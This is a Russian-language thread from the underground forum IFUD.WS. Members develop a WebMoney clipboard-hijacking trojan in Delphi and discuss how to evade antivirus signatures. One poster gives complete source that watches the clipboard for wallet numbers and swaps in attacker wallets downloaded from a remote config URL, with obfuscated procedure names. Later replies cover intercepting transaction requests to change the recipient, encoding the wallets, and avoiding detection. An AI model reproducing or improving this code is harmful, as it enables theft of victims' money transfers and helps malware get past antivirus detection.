1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

Чё за нах?

Тема в разделе "Курилка", создана пользователем K_NoW, 12 окт 2014.

  1. TopicStarter Overlay
    K_NoW

    K_NoW HackMe Please

    Регистрация:
    16 мар 2014
    Сообщения:
    464
    Симпатии:
    222
    Вопщем пишу прогу на делфи. После компиляции залил на NoDistribute. И тут бац: Please login or register to view links
    Чё за нах? Как убрать такие сигны.
    Софт - это ВМ трой для подмены кошеля в буфере. Только на WinApi
    Пробовал создавать окно на WinAPi дабы замусорить код. Всё равно эти 2 проклятые сигны.

    ---
    p.s А что такое с форумом было всё таки пару месяцев в ауте был?
     
    Метки:
  2. EEjester

    EEjester hack_the_god

    Регистрация:
    25 окт 2012
    Сообщения:
    1.326
    Симпатии:
    941
    Код:
    program Project1;
     
    uses
      Windows, WinInet, SysUtils, XPMan, Forms;
     
    var
      hSession, hURL: HInternet;
      bResult: boolean;
      Buffer: array [0 .. 1024] of AnsiChar;
      dwBytesRead: DWORD;
      trigger: Boolean = True;
      state, wmr, wmz, wme, wmu: string;
      time1: Integer = 0;
      time2: Integer = 0;
      P: String;
      H: THandle;
     
    {$R *.res}
     
    function GetWin(Comand: string): string;
    var
      buff: array [0 .. $FF] of char;
    begin
      ExpandEnvironmentStrings(PChar(Comand), buff, SizeOf(buff));
      Result := buff;
    end;
     
    function SetClipboardText(Wnd: HWND; Value: string): Boolean;
    var
      hData: HGlobal;
      pData: pointer;
      Len: integer;
    begin
      Result := True;
      if OpenClipboard(Wnd) then
      begin
        try
          Len := Length(Value) + 1;
          hData := GlobalAlloc(GMEM_MOVEABLE or GMEM_DDESHARE, Len);
          try
            pData := GlobalLock(hData);
            try
              Move(PChar(Value)^, pData^, Len);
              EmptyClipboard;
              SetClipboardData(CF_Text, hData);
            finally
              GlobalUnlock(hData);
            end;
          except
            GlobalFree(hData);
            raise
          end;
        finally
          CloseClipboard;
        end;
      end
      else
        Result := False;
    end;
     
    function Pars(T_, ForS, _T: string): string;
    var
      a, b:integer;
    begin
      Result := '';
      if (T_='') or (ForS='') or (_T='') then Exit;
      a:=Pos(T_, ForS);
      if a=0 then Exit else a:=a+Length(T_);
      ForS:=Copy(ForS, a, Length(ForS)-a+1);
      b:=Pos(_T, ForS);
      if b>0 then
      Result:=Copy(ForS, 1, b - 1);
    end;
     
    procedure StartProcess(WorkDir, Filename: string; Arguments : string = '');
    var
      StartupInfo  : TStartupInfo;
      ProcessInfo  : TProcessInformation;
      lCmd         : string;
      lOK          : Boolean;
      LastErrorCode: Integer;
    begin
      FillChar( StartupInfo, SizeOf( TStartupInfo ), 0 );
      StartupInfo.cb := SizeOf( TStartupInfo );
      StartupInfo.dwFlags := STARTF_USESHOWWINDOW;
      StartupInfo.wShowWindow := sw_Normal;
     
      FillChar( ProcessInfo, SizeOf( TProcessInformation ), 0 );
     
      lCmd := '"' +  WorkDir + FileName + '"';
      if Arguments <> '' then lCmd := lCmd + ' ' + Arguments;
     
      lOk := CreateProcess(nil,
                           PChar(lCmd),
                           nil,
                           nil,
                           FALSE,
                           0,
                           nil,
                           nil,
                           StartupInfo,
                           ProcessInfo);
     
      if lOk then
      begin
          CloseHandle( ProcessInfo.hThread );
          CloseHandle( ProcessInfo.hProcess );
      end
      else
      begin
        LastErrorCode := GetLastError;
      end;
    end;
     
    procedure IYOy1kCnZrNUwsrD2WMlQw;
    var
      Data: DWORD;
      StrData: PWideChar;
      OK: Boolean;
      s: string;
      i: Integer;
    begin
      if trigger = True then
      begin
      if OpenClipboard(0) then
      begin
      Data := GetClipboardData(CF_UNICODETEXT);
      StrData := PWideChar(GlobalLock(Data));
      GlobalUnlock(Data);
      s := StrData;
        OK := True;
        if (Length(s) = 13) and (s[1] = 'R') then
          for i := 2 to 13 do
            if not (s in ['0'..'9']) then
            begin
              OK := False;
              Break;
            end
        else else
          OK := False;
        if OK then
        begin
          SetClipboardText(0, wmr);
        end;
     
        OK := True;
        if (Length(s) = 13) and (s[1] = 'Z') then
          for i := 2 to 13 do
            if not (s in ['0'..'9']) then
            begin
              OK := False;
              Break;
            end
        else else
          OK := False;
        if OK then
        begin
          SetClipboardText(0, wmz);
        end;
     
        OK := True;
        if (Length(s) = 13) and (s[1] = 'E') then
          for i := 2 to 13 do
            if not (s in ['0'..'9']) then
            begin
              OK := False;
              Break;
            end
        else else
          OK := False;
        if OK then
        begin
          SetClipboardText(0, wme);
        end;
     
        OK := True;
        if (Length(s) = 13) and (s[1] = 'U') then
          for i := 2 to 13 do
            if not (s in ['0'..'9']) then
            begin
              OK := False;
              Break;
            end
        else else
          OK := False;
        if OK then
        begin
          SetClipboardText(0, wmu);
        end;
      end;
      CloseClipboard;
      end;
    end;
     
    procedure MFAVAhI9TMbQjY53GcIdDg;
    begin
      ZeroMemory(@Buffer, SizeOf(Buffer));
      hSession := InternetOpen('Mozilla/5.0 (compatible; YandexMetrika/2.0)', INTERNET_OPEN_TYPE_PRECONFIG, nil, nil, 0);
      hURL := InternetOpenUrl(hSession, 'http://admin.com/cfg.txt', nil, 0, 0, 0);
      bResult := InternetReadFile(hURL, @Buffer, SizeOf(Buffer), dwBytesRead);
      InternetCloseHandle(hURL);
      InternetCloseHandle(hSession);
     
      state:=pars('state=', Buffer, ';');
      wmr:=pars('WMR=', Buffer, ';');
      wmz:=pars('WMZ=', Buffer, ';');
      wme:=pars('WME=', Buffer, ';');
      wmu:=pars('WMU=', Buffer, ';');
     
      if state = '0' then trigger:=False else trigger:=True;
    end;
     
    procedure q5VQy3zMogfVW9G4UOvqrQ;
    begin
      time1:= (time1)+(1);
      if time1 = 1800 then
      begin
        MFAVAhI9TMbQjY53GcIdDg;
        time1:= 0;
      end;
     
      time2:= (time2)+(1);
      if time2 = 1 then
      begin
        IYOy1kCnZrNUwsrD2WMlQw;
        time2:= 0;
      end;
     
      Sleep(1000);
      q5VQy3zMogfVW9G4UOvqrQ;
    end;
     
    begin
      CreateMutex(Nil, True, '3hmN3Y2MnRyOcz47F1jm');
      If GetLastError <> 0 Then
      begin
        Halt(0);
      end
      else
      begin
        q5VQy3zMogfVW9G4UOvqrQ;
        MFAVAhI9TMbQjY53GcIdDg;
      end;
    end.
     
    • Like Like x 1
  3. TopicStarter Overlay
    K_NoW

    K_NoW HackMe Please

    Регистрация:
    16 мар 2014
    Сообщения:
    464
    Симпатии:
    222

    Как я понял.
    Получает кошельки из инета и если stats=1 значит работает.
    А зачем модуль Forms?
     
  4. EEjester

    EEjester hack_the_god

    Регистрация:
    25 окт 2012
    Сообщения:
    1.326
    Симпатии:
    941
    Да просто. Можно его смело бахнуть. Троян работает на чтстом winapi. Если нужно то могу выложить пример админки.
     
  5. grs101

    grs101

    Регистрация:
    30 сен 2012
    Сообщения:
    286
    Симпатии:
    262
    А можно сделать чтобы визуально номер кошелька отображался настоящий, а вводился другой?
     
  6. EEjester

    EEjester hack_the_god

    Регистрация:
    25 окт 2012
    Сообщения:
    1.326
    Симпатии:
    941
    конечно! ловишь get пакет трансакции и подменяешь в нем кошель на свой и всё. но дело в том что в вебмани есть такая фича типо после того как вы нажали перевести, вылазит следующее окно: вы действительно хотите перевести n-ную сумму на такой то кошелек, и вот тогда то уже и палево будет. так что лучше уж с буфером. темболее кошельки никто никогда не сравнивает... тупо ctrl+c => ctrl+v
     
    • Like Like x 1
  7. grs101

    grs101

    Регистрация:
    30 сен 2012
    Сообщения:
    286
    Симпатии:
    262
    Да мне не обязательно для вебмани. Главное как это реализовать. Можешь пример исходника выложить если не сложно.
     
  8. EEjester

    EEjester hack_the_god

    Регистрация:
    25 окт 2012
    Сообщения:
    1.326
    Симпатии:
    941
    немогу. так как использую его в своем трояне...
     
  9. grs101

    grs101

    Регистрация:
    30 сен 2012
    Сообщения:
    286
    Симпатии:
    262
    Понял, буду сам думать.
     
  10. TopicStarter Overlay
    K_NoW

    K_NoW HackMe Please

    Регистрация:
    16 мар 2014
    Сообщения:
    464
    Симпатии:
    222
    Пару вопросов.
    Зачем процедура StartProcess она не вызывается нигде. Процедура парсинга тоже не вызывается. Я переписал под себя. Добавил кодирвоание кошелька вот пример:
    state=1;WMK=123;WMR=53333a36333635363431373432;WMZ=5b3338333337383b3739383333;WMU=563337313b3539333b38393a33;

    Что значит это условие:
    1. begin
    2. time1:= (time1)+(1);
    3. if time1 = 1800 then
    4. begin
    5. MFAVAhI9TMbQjY53GcIdDg;
    6. time1:= 0;
    7. end;
    --- добавлено: 14 окт 2014 в 17:25 ---
    Ещё вопросик. Можешь подкинуть код подмены с мусором. Например: Я пишу тебе: Скинь мне 100$ мой кошель: ZXXXXXXXXXXXX.
    Так вот как подменить те XXXXXXXXXXXX?
     

Поделиться этой страницей

Загрузка...